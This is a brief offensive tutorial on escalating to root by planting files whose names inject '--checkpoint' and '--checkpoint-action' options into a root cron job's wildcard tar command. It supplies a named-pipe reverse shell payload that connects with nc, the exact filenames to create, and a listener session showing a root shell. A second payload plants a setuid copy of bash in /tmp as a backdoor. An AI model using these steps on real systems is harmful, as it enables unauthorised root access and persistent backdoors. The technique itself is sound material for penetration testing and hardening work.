Wildcards, Tar and Checkpoints

Tar comes with a feature called “checkpoints” that allows periodic execution of actions at certain points of the archiving process. An example may be a large tar backup running on a cron job that periodically emails its progress after every 10,000th file as been archived. If that tar job is using a wildcard to backup a directory then we can inject our own checkpoint into the tar job that will execute our own code.

Exploit

You find this cron job running as super user every 5 minutes. The cron is utilising wildcards and the home/backups folder is writable. Perfect to insert a tar checkpoint.

-rw-r--r-- 1 root root 62 Oct 24 20:52 backup_files.sh

#!/bin/bash

cd /home/backups
tar cvf /tmp/backup_files.tar *

Steps

  1. Create Malicious payload.
    echo -n "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 4444 >/tmp/f" > /home/backups/runme.sh
  2. Create the checkpoint.
    touch /home/backups/--checkpoint=1
  3. The action to perform when the checkpoint is hit
    touch /home/backups/--checkpoint-action=exec=sh\ runme.sh

Now the next time the cron runs the backup_files.sh script, the checkpoint will be hit and our runme.sh script will be run with the user privileges of backup_files.sh.

nc -lnvp 4444
listening on [any] 4444 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 55592
# id
uid=0(root) gid=0(root) groups=0(root),141(kaboxer)

For a less noisy payload you can copy /bin/bash to tmp with suid bit set. 

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/backups/runme.sh